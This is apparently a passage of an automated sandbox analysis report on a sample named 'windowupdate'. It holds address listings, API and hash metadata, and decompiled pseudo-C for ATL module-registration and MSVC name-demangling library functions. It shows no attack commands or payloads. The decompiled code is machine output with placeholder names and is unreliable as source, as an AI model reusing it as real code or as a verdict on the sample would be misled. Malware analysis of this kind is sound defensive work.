                      0x00d3a761
                      0x00d3a76d
                      0x00d3a772
                      0x00d3a78b
                      0x00d3a790
                      0x00d3a79d
                      0x00000000
                      0x00d3a79d
                      0x00d3a730
                      0x00000000
                      0x00d3a730
                      0x00d3a6f9
                      0x00000000
                      0x00d3a6f9
                      0x00d3a6a1
                      0x00d3a6ae
                      0x00d3a6b3
                      0x00000000
                      0x00d3a6b3
                      0x00d3a627
                      0x00d3a634
                      0x00d3a639
                      0x00000000
                      0x00d3a639
                      0x00d3a57b
                      0x00d3a580
                      0x00d3a586
                      0x00d3a588
                      0x00000000
                      0x00000000
                      0x00d3a590
                      0x00d3a59c
                      0x00d3a5a1
                      0x00d3a5ba
                      0x00d3a5bf
                      0x00d3a5cc
                      0x00000000
                      0x00d3a5cc
                      0x00d3a55f
                      0x00000000
                      0x00d3a55f
                      0x00d3a528
                      0x00000000
                      0x00d3a528
                      0x00d3a361
                      0x00d3a364
                      0x00d3a368
                      0x00d3a388
                      0x00d3a395
                      0x00d3a39a
                      0x00d3a39d
                      0x00d3a39f
                      0x00d3a3b0
                      0x00d3a3b7
                      0x00d3a416
                      0x00d3a422
                      0x00d3a428
                      0x00d3a440
                      0x00d3a446
                      0x00d3a44c
                      0x00d3a452
                      0x00d3a452
                      0x00d3a458
                      0x00d3a45e
                      0x00d3a465
                      0x00d3a48b
                      0x00d3a490
                      0x00d3a493
                      0x00d3a4a5
                      0x00d3a4ab
                      0x00d3a4b1
                      0x00d3a4b7
                      0x00d3a4d3
                      0x00d3a4d3
                      0x00d3a4e0
                      0x00d3a4e5
                      0x00000000
                      0x00d3a4e5
                      0x00d3a4bf
                      0x00d3a4c5
                      0x00000000
                      0x00000000
                      0x00d3a4c7
                      0x00d3a4d1
                      0x00d3a4fc
                      0x00d3a511
                      0x00d3a516
                      0x00000000
                      0x00d3a516
                      0x00000000
                      0x00d3a4d1
                      0x00d3a467
                      0x00d3a474
                      0x00d3a479
                      0x00000000
                      0x00d3a479
                      0x00d3a3bd
                      0x00d3a3c2
                      0x00d3a3c8
                      0x00d3a3ca
                      0x00000000
                      0x00000000
                      0x00d3a3d2
                      0x00d3a3de
                      0x00d3a3e3
                      0x00d3a3fc
                      0x00d3a401
                      0x00d3a40e
                      0x00000000
                      0x00d3a40e
                      0x00d3a3a1
                      0x00000000
                      0x00d3a3a1
                      0x00d3a36a
                      0x00000000
                      0x00d3a36a
                      0x00d3a31c
                      0x00d3a325
                      0x00d3a32a
                      0x00000000
                      0x00d3a2da
                      0x00d3a2df
                      0x00d3a2eb
                      0x00d3a2f4
                      0x00d3a2f9
                      0x00d3a8a9
                      0x00d3a8b9
                      0x00d3a8be
                      0x00d3a8bf
                      0x00d3a8d5
                      0x00d3a8d5
                      0x00d3a2d8
                      0x00d3a237
                      0x00d3a207
                      0x00d3a20b
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?), ref: 00D3A2BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: FileModuleName
                      • String ID: $ $ $%ls$.tlb$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hInstTypeLib != 0$pbstrPath != 0 && ppTypeLib != 0
                      • API String ID: 514040917-3249255110
                      • Opcode ID: 63e4d0b2e911d12cb123e744b1bbe382ae81ba93626a0c1e21e4db5fd1c9c7e1
                      • Instruction ID: 15ca5fc6f306eea48e31c89159b542d0dd411610ac8f1aa42d5d22722124f054
                      • Opcode Fuzzy Hash: 63e4d0b2e911d12cb123e744b1bbe382ae81ba93626a0c1e21e4db5fd1c9c7e1
                      • Instruction Fuzzy Hash: 6F1216B5E00229DFDB24DF98DC85BEEB3B4EB48300F148199E549A7241DB749E84CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D52940 Relevance: 33.2, APIs: 22, Instructions: 210COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D52940(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char* _t80;
				intOrPtr _t109;
				intOrPtr _t119;
				char _t123;
				void* _t131;
				intOrPtr _t169;
				char* _t177;
				void* _t181;
				void* _t182;
				void* _t183;

				_t182 = __esi;
				_t181 = __edi;
				_t131 = __ebx;
				_t80 =  *0xf20640; // 0x0
				if( *_t80 == 0) {
					if(E00D5A560(_a8) != 0) {
						_v56 = E00D4F270( &_v204, 0x5b);
						_v60 = E00D4FC30(_v56,  &_v212, 1);
						E00D52CD0(_a4, E00D4FBB0(_v60,  &_v220, 0x5d));
						return _a4;
					}
					_v84 = E00D50060(")[", 2);
					_v80 = _t169;
					_v44 = E00D4FAD0( &_v172, 0x28, _a8);
					_v48 = E00D4FB30(_v44,  &_v180,  &_v84);
					_v52 = E00D4FC30(_v48,  &_v188, 1);
					E00D52CD0(_a4, E00D4FBB0(_v52,  &_v196, 0x5d));
					return _a4;
				}
				_v8 = E00D55D80();
				if(_v8 < 0) {
					_v8 = 0;
				}
				if(_v8 != 0) {
					E00D4F3F0( &_v16);
					if(E00D5A520(_a8) != 0) {
						_t123 = E00D50060(0xdc8da8, 2);
						_t183 = _t183 + 8;
						_v68 = _t123;
						_v64 = _t169;
						E00D4FCA0( &_v16,  &_v68);
					}
					while(E00D5A6C0( &_v16) != 0) {
						_v28 = _v8;
						_v8 = _v8 - 1;
						if(_v28 == 0) {
							break;
						}
						_t177 =  *0xf20640; // 0x0
						if( *_t177 == 0) {
							break;
						}
						_t119 = E00D4FAD0( &_v124, 0x5b, E00D54900(_t131, _t181, _t182,  &_v116, 0));
						_t183 = _t183 + 0x14;
						_v32 = _t119;
						E00D4FD40( &_v16, E00D4FBB0(_v32,  &_v132, 0x5d));
					}
					if(E00D5A560(_a8) == 0) {
						if(E00D5A520(_a8) == 0) {
							_t109 = E00D4FAD0( &_v148, 0x28, _a8);
							_t183 = _t183 + 0xc;
							_v36 = _t109;
							_v40 = E00D4FBB0(_v36,  &_v156, 0x29);
							E00D4F820( &_v16, E00D4FB70(_v40,  &_v164,  &_v16));
						} else {
							E00D4F820( &_v16, E00D4FB70(_a8,  &_v140,  &_v16));
						}
					}
					E00D56AB0(_t131, _t181, _t182,  &_v76,  &_v16);
					E00D5AA80( &_v76);
					E00D4F240(_a4,  &_v76);
					return _a4;
				}
				_v20 = E00D4F270( &_v92, 0x5b);
				_v24 = E00D4FC30(_v20,  &_v100, 1);
				E00D52CD0(_a4, E00D4FBB0(_v24,  &_v108, 0x5d));
				return _a4;
			}
















































                      0x00d52940
                      0x00d52940
                      0x00d52940
                      0x00d52949
                      0x00d52953
                      0x00d52b0f
                      0x00d52b9a
                      0x00d52bae
                      0x00d52bc7
                      0x00000000
                      0x00d52bcf
                      0x00d52b20
                      0x00d52b23
                      0x00d52b3b
                      0x00d52b51
                      0x00d52b65
                      0x00d52b7e
                      0x00000000
                      0x00d52b86
                      0x00d5295e
                      0x00d52965
                      0x00d52967
                      0x00d52967
                      0x00d52972
                      0x00d529bd
                      0x00d529cc
                      0x00d529d5
                      0x00d529da
                      0x00d529dd
                      0x00d529e0
                      0x00d529ea
                      0x00d529ea
                      0x00d529ef
                      0x00d529fe
                      0x00d52a07
                      0x00d52a0e
                      0x00000000
                      0x00000000
                      0x00d52a10
                      0x00d52a1b
                      0x00000000
                      0x00000000
                      0x00d52a32
                      0x00d52a37
                      0x00d52a3a
                      0x00d52a4f
                      0x00d52a4f
                      0x00d52a60
                      0x00d52a6c
                      0x00d52a99
                      0x00d52a9e
                      0x00d52aa1
                      0x00d52ab5
                      0x00d52acf
                      0x00d52a6e
                      0x00d52a85
                      0x00d52a85
                      0x00d52a6c
                      0x00d52adc
                      0x00d52ae7
                      0x00d52af3
                      0x00000000
                      0x00d52af8
                      0x00d5297e
                      0x00d5298f
                      0x00d529a5
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name::operator+$EmptyName::isoperator+
                      • String ID:
                      • API String ID: 2054230242-0
                      • Opcode ID: b0144724780e5397e9c46eafe66d9a7dc958038cc325c43501f7275b04c81fbe
                      • Instruction ID: 78eebbea5f91067c84147bebe929876d449d4080c0bf002265fa466179c2d021
                      • Opcode Fuzzy Hash: b0144724780e5397e9c46eafe66d9a7dc958038cc325c43501f7275b04c81fbe
                      • Instruction Fuzzy Hash: 6E81FA71900208ABDF14EFA4DC92FFEB775EF45301F548169ED09AA191EB306A49CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D37640 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 337COMMON
                      Download Yara Rule
                      C-Code - Quality: 78%
                      			E00D37640(void* __ebx, void* __ecx) {
				signed int _v8;
				void* _v12;
				CHAR* _v20;
				intOrPtr _v28;
				signed int _v32;
				CHAR* _v36;
				char _v44;
				char _v312;
				struct HINSTANCE__* _v320;
				intOrPtr _v324;
				signed int _v328;
				char _v594;
				char _v596;
				void* _v608;
				signed int _v616;
				struct _SHFILEINFOA _v972;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				signed int _v992;
				signed int _v996;
				signed int _v1000;
				signed int _v1004;
				CHAR* _v1012;
				CHAR* _v1020;
				CHAR* _v1024;
				char* _v1028;
				intOrPtr _v1032;
				char _v1036;
				void* _v1044;
				void* __edx;
				void* __edi;
				void* __esi;
				signed int _t131;
				void* _t145;
				void* _t149;
				signed int _t156;
				void* _t161;
				void* _t164;
				long _t168;
				signed int _t169;
				void* _t172;
				intOrPtr _t176;
				void* _t178;
				void* _t181;
				void* _t184;
				signed char _t188;
				struct HINSTANCE__* _t196;
				void* _t197;
				void* _t200;
				void* _t206;
				intOrPtr* _t210;
				short _t247;
				signed int _t251;
				void* _t260;
				intOrPtr* _t261;
				void* _t267;
				void* _t268;
				signed int _t276;
				void* _t277;
				intOrPtr _t278;

				_t206 = __ebx;
				_push(__ecx);
				_t267 =  &_v1036;
				memset(_t267, 0xcccccccc, 0x102 << 2);
				_t278 = _t277 + 0xc;
				_t268 = _t267 + 0x102;
				_pop(_t210);
				_t131 =  *0xdf600c; // 0x71e60372
				_v8 = _t131 ^ _t276;
				_v12 = _t210;
				_v1012 = 0;
				_v20 = 0;
				_v28 = E00D31AB0();
				_v32 = 0;
				_v36 = 0;
				E00D3F2E0( &_v44);
				_v320 = E00D32B10(0xf20220);
				_t269 = _t278;
				_t213 = _v320;
				_v324 = E00DC1520(GetModuleFileNameA(_v320,  &_v312, 0x104), _t278 - _t278);
				if(_v324 != 0) {
					__eflags = _v324 - 0x104;
					if(_v324 != 0x104) {
						__eflags = _v320;
						if(_v320 == 0) {
							L6:
							_t247 = "\""; // 0x22
							_v596 = _t247;
							E00D4AF80(_t268,  &_v594, 0, 0x104);
							E00D327B0(_t206, _t268, _t269, __eflags,  &_v596, 0x106,  &_v312);
							E00D327B0(_t206, _t268, _t269, __eflags,  &_v596, 0x106, "\"");
							_t278 = _t278 + 0x24;
							_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "Module",  &_v596);
							__eflags = _t278 - _t278;
							_v328 = E00DC1520(_t145, _t278 - _t278);
							L8:
							__eflags = _v328;
							if(_v328 >= 0) {
								_t251 =  *_v12;
								_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x14))))(_v12, "Module_Raw",  &_v312);
								__eflags = _t278 - _t278;
								_v328 = E00DC1520(_t149, _t278 - _t278);
								__eflags = _v328;
								if(_v328 >= 0) {
									_t272 = _t278;
									__imp__StringFromCLSID(0xf23678,  &_v608);
									__eflags = _t278 - _t278;
									_v328 = E00DC1520( &_v608, _t278 - _t278);
									__eflags = _v328;
									if(_v328 >= 0) {
										_v32 = _v608;
										__eflags = _v32;
										if(__eflags != 0) {
											_v20 = E00D85A70(_v32) + 1;
											_t156 = E00D31780( &_v20, _t272, __eflags,  &_v20, _v20, 2);
											_t278 = _t278 + 0x10;
											__eflags = _t156;
											if(_t156 >= 0) {
												__eflags = _v20 - 0x400;
												if(__eflags > 0) {
													L21:
													_v1036 = E00D3F270(_t206,  &_v44, __eflags, _v20);
													L22:
													_v1024 = E00D31BB0(_v20, _t272, _v1036, _v32, _v20, _v28);
													L23:
													_v1020 = _v1024;
													L24:
													_v616 = _v1020;
													do {
														__eflags = _v616;
														if(__eflags == 0) {
															_t161 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0xcd, 0, "%ls", L"pszModuleGUID != 0");
															_t278 = _t278 + 0x18;
															__eflags = _t161 - 1;
															if(_t161 == 1) {
																asm("int3");
															}
														}
														__eflags = 0;
													} while (0 != 0);
													_t164 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "MODULEGUID", _v616);
													__eflags = _t278 - _t278;
													_v328 = E00DC1520(_t164, _t278 - _t278);
													_t274 = _t278;
													__imp__CoTaskMemFree(_v608);
													__eflags = _t278 - _t278;
													E00DC1520(_t165, _t278 - _t278);
													__eflags = _v328;
													if(_v328 >= 0) {
														_t168 = SHGetFileInfoA( &_v312, 0,  &_v972, 0x160, 0x2000);
														__eflags = _t278 - _t278;
														_t169 = E00DC1520(_t168, _t278 - _t278);
														__eflags = _t169;
														if(_t169 != 0) {
															_t274 = _t278;
															_t251 = _v12;
															_t172 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_t251, "MODULETYPE", "LocalServer32");
															__eflags = _t278 - _t278;
															_v328 = E00DC1520(_t172, _t278 - _t278);
														} else {
															_t274 = _t278;
															_t251 =  *((intOrPtr*)( *_v12 + 0x14));
															_t184 =  *_t251(_v12, "MODULETYPE", "InprocServer32");
															__eflags = _t278 - _t278;
															_v328 = E00DC1520(_t184, _t278 - _t278);
														}
														__eflags = _v328;
														if(_v328 >= 0) {
															_t274 = _t278;
															_t261 =  *0xf215ec; // 0xf236c0
															_t251 =  *((intOrPtr*)( *_t261 + 0x14));
															_t181 =  *_t251(_v12);
															__eflags = _t278 - _t278;
															_v328 = E00DC1520(_t181, _t278 - _t278);
														}
														_v1004 = _v328;
														E00D3F220( &_v44);
														_t176 = _v1004;
													} else {
														_t251 = _v328;
														_v1000 = _t251;
														E00D3F220( &_v44);
														_t176 = _v1000;
													}
													goto L37;
												}
												_t188 = E00D31900(__eflags, _v20);
												_t278 = _t278 + 4;
												__eflags = _t188 & 0x000000ff;
												if(__eflags == 0) {
													goto L21;
												}
												_v1028 =  &(_v20[0x24]);
												E00DBF1D0(_v1028);
												_v1032 = _t278;
												E00DC13A0(_v1032, _v1028,  &_v1012);
												_v1032 = _v1032 + 0x20;
												_v1036 = _v1032;
												goto L22;
											}
											_v1024 = 0;
											goto L23;
										}
										_v1020 = 0;
										goto L24;
									}
									_v996 = _v328;
									E00D3F220( &_v44);
									_t176 = _v996;
									goto L37;
								}
								_t251 = _v328;
								_v992 = _t251;
								E00D3F220( &_v44);
								_t176 = _v992;
								goto L37;
							}
							_t251 = _v328;
							_v988 = _t251;
							E00D3F220( &_v44);
							_t176 = _v988;
							goto L37;
						}
						_t269 = _t278;
						_t196 = GetModuleHandleA(0);
						__eflags = _t278 - _t278;
						_t197 = E00DC1520(_t196, _t278 - _t278);
						__eflags = _v320 - _t197;
						if(_v320 != _t197) {
							_t274 = _t278;
							_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "Module",  &_v312);
							__eflags = _t278 - _t278;
							_v328 = E00DC1520(_t200, _t278 - _t278);
							goto L8;
						}
						goto L6;
					}
					_v984 = E00D31710(_t213, 0x7a);
					E00D3F220( &_v44);
					_t176 = _v984;
					goto L37;
				} else {
					_v980 = E00D32DC0(_t213, _t269);
					E00D3F220( &_v44);
					_t176 = _v980;
					L37:
					E00DC13E0(_t206, _t276, 0xd37b50, _v1012);
					_t178 = _t176;
					_t260 = _t251;
					return E00D47280(_t178, _t206, _v8 ^ _t276, _t260, _t268, _t274);
				}
			}
































































                      0x00d37640
                      0x00d3764b
                      0x00d3764c
                      0x00d3765c
                      0x00d3765c
                      0x00d3765c
                      0x00d3765e
                      0x00d3765f
                      0x00d37666
                      0x00d37669
                      0x00d3766c
                      0x00d37676
                      0x00d37682
                      0x00d37685
                      0x00d3768c
                      0x00d37696
                      0x00d376a5
                      0x00d376ab
                      0x00d376b9
                      0x00d376cd
                      0x00d376da
                      0x00d376fc
                      0x00d37706
                      0x00d3772b
                      0x00d37732
                      0x00d37751
                      0x00d37751
                      0x00d37758
                      0x00d3776d
                      0x00d37788
                      0x00d377a1
                      0x00d377a6
                      0x00d377c3
                      0x00d377c5
                      0x00d377cc
                      0x00d377fd
                      0x00d377fd
                      0x00d37804
                      0x00d37836
                      0x00d3783f
                      0x00d37841
                      0x00d37848
                      0x00d3784e
                      0x00d37855
                      0x00d37876
                      0x00d37884
                      0x00d3788a
                      0x00d37891
                      0x00d37897
                      0x00d3789e
                      0x00d378c5
                      0x00d378c8
                      0x00d378cc
                      0x00d378ec
                      0x00d378f9
                      0x00d378fe
                      0x00d37901
                      0x00d37903
                      0x00d37914
                      0x00d3791b
                      0x00d3797a
                      0x00d37986
                      0x00d3798c
                      0x00d379a4
                      0x00d379aa
                      0x00d379b0
                      0x00d379b6
                      0x00d379bc
                      0x00d379c2
                      0x00d379c2
                      0x00d379c9
                      0x00d379e3
                      0x00d379e8
                      0x00d379eb
                      0x00d379ee
                      0x00d379f0
                      0x00d379f0
                      0x00d379ee
                      0x00d379f1
                      0x00d379f1
                      0x00d37a0f
                      0x00d37a11
                      0x00d37a18
                      0x00d37a1e
                      0x00d37a27
                      0x00d37a2d
                      0x00d37a2f
                      0x00d37a34
                      0x00d37a3b
                      0x00d37a78
                      0x00d37a7e
                      0x00d37a80
                      0x00d37a85
                      0x00d37a87
                      0x00d37ab2
                      0x00d37ac3
                      0x00d37aca
                      0x00d37acc
                      0x00d37ad3
                      0x00d37a89
                      0x00d37a89
                      0x00d37a9e
                      0x00d37aa1
                      0x00d37aa3
                      0x00d37aaa
                      0x00d37aaa
                      0x00d37ad9
                      0x00d37ae0
                      0x00d37ae2
                      0x00d37ae8
                      0x00d37af6
                      0x00d37af9
                      0x00d37afb
                      0x00d37b02
                      0x00d37b02
                      0x00d37b0e
                      0x00d37b17
                      0x00d37b1c
                      0x00d37a3d
                      0x00d37a3d
                      0x00d37a43
                      0x00d37a4c
                      0x00d37a51
                      0x00d37a51
                      0x00000000
                      0x00d37a3b
                      0x00d37921
                      0x00d37926
                      0x00d3792c
                      0x00d3792e
                      0x00000000
                      0x00000000
                      0x00d37936
                      0x00d37942
                      0x00d37947
                      0x00d37960
                      0x00d37965
                      0x00d37972
                      0x00000000
                      0x00d37972
                      0x00d37905
                      0x00000000
                      0x00d37905
                      0x00d378ce
                      0x00000000
                      0x00d378ce
                      0x00d378a6
                      0x00d378af
                      0x00d378b4
                      0x00000000
                      0x00d378b4
                      0x00d37857
                      0x00d3785d
                      0x00d37866
                      0x00d3786b
                      0x00000000
                      0x00d3786b
                      0x00d37806
                      0x00d3780c
                      0x00d37815
                      0x00d3781a
                      0x00000000
                      0x00d3781a
                      0x00d37734
                      0x00d37738
                      0x00d3773e
                      0x00d37740
                      0x00d37745
                      0x00d3774b
                      0x00d377d4
                      0x00d377ee
                      0x00d377f0
                      0x00d377f7
                      0x00000000
                      0x00d377f7
                      0x00000000
                      0x00d3774b
                      0x00d37712
                      0x00d3771b
                      0x00d37720
                      0x00000000
                      0x00d376dc
                      0x00d376e1
                      0x00d376ea
                      0x00d376ef
                      0x00d37b22
                      0x00d37b32
                      0x00d37b37
                      0x00d37b38
                      0x00d37b4e
                      0x00d37b4e

                      APIs
                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00D376C0
                      • _HRESULT_FROM_WIN32.LIBCMTD ref: 00D3770A
                        • Part of subcall function 00D32DC0: GetLastError.KERNEL32 ref: 00D32DCE
                        • Part of subcall function 00D32DC0: _HRESULT_FROM_WIN32.LIBCMTD ref: 00D32DE2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ErrorFileLastModuleName
                      • String ID: $%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$InprocServer32$LocalServer32$MODULEGUID$MODULETYPE$Module$Module_Raw$pszModuleGUID != 0
                      • API String ID: 2776309574-3582396993
                      • Opcode ID: c69e4625e8d707eb8ac01452a8645c5ae998af144fce9a1e49cfc221b3230882
                      • Instruction ID: fae337fe95ac87bc6fa8312475e5e7bb0e2c13333d62718aeee77b70b0b8553a
                      • Opcode Fuzzy Hash: c69e4625e8d707eb8ac01452a8645c5ae998af144fce9a1e49cfc221b3230882
                      • Instruction Fuzzy Hash: D6E109B6D002299FCB24EF54DC86BEEB7B4EB48340F0441A9E549A7291D7709E85CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D54C20 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 171COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D54C20(intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char* _v64;
				char _v68;
				char* _v72;
				char _v76;
				char* _v80;
				char _v84;
				char* _v88;
				char _v92;
				char* _v96;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char* _t62;
				intOrPtr _t66;
				intOrPtr _t75;
				char* _t91;
				char* _t92;
				char* _t97;
				intOrPtr _t104;
				signed int _t110;
				void* _t112;

				_t104 = __edx;
				_t62 =  *0xf20640; // 0x0
				if( *_t62 != 0) {
					E00D4F3F0( &_v44);
					_t91 =  *0xf20640; // 0x0
					if( *_t91 != 0x57) {
						if(E00D521A0(_t91) == 0 || E00D52290() != 0) {
							_v20 = 0;
						} else {
							_v20 = 1;
						}
						_v24 = _v20;
					} else {
						_v24 = E00D521A0(_t91);
					}
					if(_v24 == 0) {
						_t92 =  *0xf20640; // 0x0
						_v36 =  *_t92;
						_t66 =  *0xf20640; // 0x0
						 *0xf20640 = _t66 + 1;
						if(_v36 == 0x57) {
							E00D54EA0( &_v132);
							_t112 = _t112 + 4;
						}
						goto L21;
					} else {
						E00D4F3F0( &_v16);
						_t97 =  *0xf20640; // 0x0
						_v32 =  *_t97;
						_t75 =  *0xf20640; // 0x0
						 *0xf20640 = _t75 + 1;
						_v8 = _v32;
						_t110 = _v8 - 0x54;
						_v8 = _t110;
						if(_v8 > 5) {
							L18:
							E00D4F820( &_v44,  &_v16);
							L21:
							E00D4FD40( &_v44, E00D54E80( &_v140));
							E00D4F240(_a4,  &_v44);
							return _a4;
						}
						switch( *((intOrPtr*)(_v8 * 4 +  &M00D54E5C))) {
							case 0:
								_t80 = E00D50060("union ", 6);
								_t112 = _t112 + 8;
								_v60 = _t80;
								_v56 = _t110;
								E00D4F7E0( &_v16,  &_v60);
								goto L18;
							case 1:
								_v68 = E00D50060("struct ", 7);
								_v64 = __edx;
								__edx =  &_v68;
								__ecx =  &_v16;
								__eax = E00D4F7E0(__ecx,  &_v68);
								goto L18;
							case 2:
								_v76 = E00D50060("class ", 6);
								_v72 = __edx;
								__eax =  &_v76;
								__ecx =  &_v16;
								__eax = E00D4F7E0(__ecx,  &_v76);
								goto L18;
							case 3:
								_v100 = E00D50060("enum ", 5);
								_v96 = __edx;
								 &_v116 = E00D54EA0( &_v116);
								__ecx =  &_v100;
								__edx =  &_v124;
								__eax = E00D4FAA0( &_v124,  &_v100, __eax);
								__ecx =  &_v16;
								__eax = E00D4F820(__ecx, __eax);
								goto L18;
							case 4:
								_v84 = E00D50060("coclass ", 8);
								_v80 = __edx;
								__ecx =  &_v84;
								__ecx =  &_v16;
								__eax = E00D4F7E0(__ecx,  &_v84);
								goto L18;
							case 5:
								_v92 = E00D50060("cointerface ", 0xc);
								_v88 = __edx;
								__edx =  &_v92;
								__ecx =  &_v16;
								__eax = E00D4F7E0(__ecx,  &_v92);
								goto L18;
						}
					}
				}
				_v52 = E00D50060("`unknown ecsu\'", 0xe);
				_v48 = _t104;
				_v28 = E00D4F1F0( &_v108,  &_v52);
				E00D4FC30(_v28, _a4, 1);
				return _a4;
			}







































                      0x00d54c20
                      0x00d54c29
                      0x00d54c33
                      0x00d54c72
                      0x00d54c77
                      0x00d54c83
                      0x00d54c96
                      0x00d54caa
                      0x00d54ca1
                      0x00d54ca1
                      0x00d54ca1
                      0x00d54cb4
                      0x00d54c85
                      0x00d54c8a
                      0x00d54c8a
                      0x00d54cbb
                      0x00d54e06
                      0x00d54e0f
                      0x00d54e12
                      0x00d54e1a
                      0x00d54e23
                      0x00d54e29
                      0x00d54e2e
                      0x00d54e2e
                      0x00000000
                      0x00d54cc1
                      0x00d54cc4
                      0x00d54cc9
                      0x00d54cd2
                      0x00d54cd5
                      0x00d54cdd
                      0x00d54ce5
                      0x00d54ceb
                      0x00d54cee
                      0x00d54cf5
                      0x00d54df8
                      0x00d54dff
                      0x00d54e31
                      0x00d54e44
                      0x00d54e50
                      0x00000000
                      0x00d54e55
                      0x00d54cfe
                      0x00000000
                      0x00d54d0c
                      0x00d54d11
                      0x00d54d14
                      0x00d54d17
                      0x00d54d21
                      0x00000000
                      0x00000000
                      0x00d54d3a
                      0x00d54d3d
                      0x00d54d40
                      0x00d54d44
                      0x00d54d47
                      0x00000000
                      0x00000000
                      0x00d54d60
                      0x00d54d63
                      0x00d54d66
                      0x00d54d6a
                      0x00d54d6d
                      0x00000000
                      0x00000000
                      0x00d54dcc
                      0x00d54dcf
